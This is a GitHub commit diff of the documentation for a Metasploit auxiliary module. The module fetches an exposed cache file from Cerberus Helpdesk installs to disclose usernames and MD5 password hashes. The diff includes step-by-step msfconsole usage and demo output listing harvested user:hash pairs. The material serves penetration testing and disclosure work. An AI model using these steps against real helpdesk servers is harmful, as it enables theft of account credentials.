Skip to content

Commit 41e96f9

Browse files
committed
updated docs
1 parent f008f2a commit 41e96f9

File tree

1 file changed

+46
-54
lines changed

1 file changed

+46
-54
lines changed
Lines changed: 46 additions & 54 deletions
Original file line numberDiff line numberDiff line change
@@ -1,69 +1,61 @@
11
## Description
22

3-
This module exploits three vulnerabilities in Advantech WebAccess.
3+
This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
4+
data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not.
45

5-
The first vulnerability is the ability for an arbitrary user to access the admin user list page,
6-
revealing the username of every user on the system.
7-
8-
The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with
9-
the data of an arbitrary user.
10-
11-
The final vulnerability exploited is that the HTML Form on the user edit page contains the user's
12-
plain text password in the masked password input box. Typically the system should replace the
13-
actual password with a masked character such as "*".
6+
## Vulnerable Application
147

8+
This module has been verified against:
159

16-
## Vulnerable Application
10+
1. Version 4.2.3 Stable (Build 925)
11+
2. Version 5.4.4
1712

18-
Version 8.1 was tested during development:
13+
However it may also work up to, but no including, version 6.7
1914

20-
http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
15+
Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
2116

22-
8.2 is not vulnerable to this.
17+
* of note, 5.4.4 has to be installed on a PRE php7 environment.
2318

2419
## Verification Steps
2520

2621
1. Start msfconsole
27-
2. ```use auxiliary/gahter/advantech_webaccess_creds```
28-
3. ```set WEBACCESSUSER [USER]```
29-
4. ```set WEBACCESSPASS [PASS]```
30-
5. ```run```
31-
32-
## Options
33-
34-
**WEBACCESSUSER**
35-
36-
The username to use to log into Advantech WebAccess. By default, there is a built-in account
37-
```admin``` that you could use.
38-
39-
**WEBACCESSPASS**
40-
41-
The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
42-
does not have a password, which could be something you can use.
43-
22+
2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
23+
3. ```set rhosts```
24+
4. ```run```
4425

4526
## Demo
4627

47-
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
48-
msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options
49-
50-
Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure):
51-
52-
Name Current Setting Required Description
53-
---- --------------- -------- -----------
54-
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
55-
RHOSTS yes The target address range or CIDR identifier
56-
RPORT 80 yes The target port (TCP)
57-
SSL false no Negotiate SSL/TLS for outgoing connections
58-
THREADS 1 yes The number of concurrent threads
59-
URI / no URL of the Cerberus Helpdesk root
60-
VHOST no HTTP server virtual host
61-
62-
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81
63-
rhosts => 10.90.5.81
64-
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
65-
66-
[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
67-
[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
68-
[+] example:112302c209fe8d73f502c132a3da2b1c
69-
[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
28+
### 4.2.3 using zend (not verbose)
29+
30+
```
31+
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
32+
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
33+
rhosts => 1.1.1.1
34+
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
35+
36+
[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
37+
[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
38+
[+] example:112302c209fe8d73f502c132a3da2b1c
39+
[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
40+
```
41+
42+
### 5.4.4 using devblocks
43+
44+
```
45+
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
46+
rhost => 192.168.2.45
47+
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
48+
rhosts => 192.168.2.45
49+
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set uri /cerb5/
50+
uri => /cerb5/
51+
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
52+
verbose => true
53+
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
54+
55+
[*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
56+
[+] [email protected]:37b51d194a7513e45b56f6524f2d51f2
57+
[+] [email protected]:acbd18db4cc2f85cedef654fccc4a4d8
58+
[+] [email protected]:18126e7bd3f84b3f3e4df094def5b7de
59+
[*] Scanned 1 of 1 hosts (100% complete)
60+
[*] Auxiliary module execution completed
61+
```

0 commit comments

Comments
 (0)